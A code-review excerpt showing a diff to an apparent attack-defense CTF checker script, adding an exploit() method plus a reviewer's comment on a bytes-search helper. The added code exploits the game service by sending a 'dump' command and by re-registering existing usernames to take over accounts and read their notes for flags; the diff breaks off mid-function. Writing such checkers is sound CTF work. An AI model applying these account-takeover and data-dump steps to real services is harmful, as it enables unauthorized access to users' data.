checker/src/checker.py

```diff
@@ -378,8 +379,52 @@ def exploit(self):
                 If nothing is returned, the service status is considered okay.
                 The preferred way to report Errors in the service is by raising an appropriate EnoException
         """
-        # TODO: We still haven't decided if we want to use this function or not. TBA
-        pass
+        if self.variant_id == 0:
+            conn = self.connect()
+            welcome = conn.read_until(">")
+            conn.write(b"dump\nexit\n")
+            data = conn.read_all()
+            if flag := self.search_flag_bytes(data):
+                return flag
+            raise BrokenServiceException("flag not found")
+        elif self.variant_id == 1:
+            conn = self.connect()
+            welcome = conn.read_until(">")
+            conn.write(b"user\n")
+            user_list = conn.read_until(b">").split(b"\n")[:-1]
+            for user in user_list:
+                user_name = user.split()[-1]
+                conn.write(b"reg %s foo\nlog %s foo\n list\n" % (user_name, user_name))
+                conn.read_until(b">")  # successfully registered
+                conn.read_until(b">")  # successfully logged in
+                notes_list = conn.read_until(b">").split(b"\n")[:-1]
+                for note in notes_list:
+                    note_id = note.split()[-1]
+                    conn.write(b"get %s\n" % note_id)
+                    data = conn.read_until(b">")
+                    if flag := self.search_flag_bytes(data):
```

Comment:
As discussed in chat, I don't see a benefit of `_bytes` method, if there really are differences in behavior between bytes and Unicode regexes, we should make sure the gameserver tells us which one to use, and then we should encode or decide accordingly.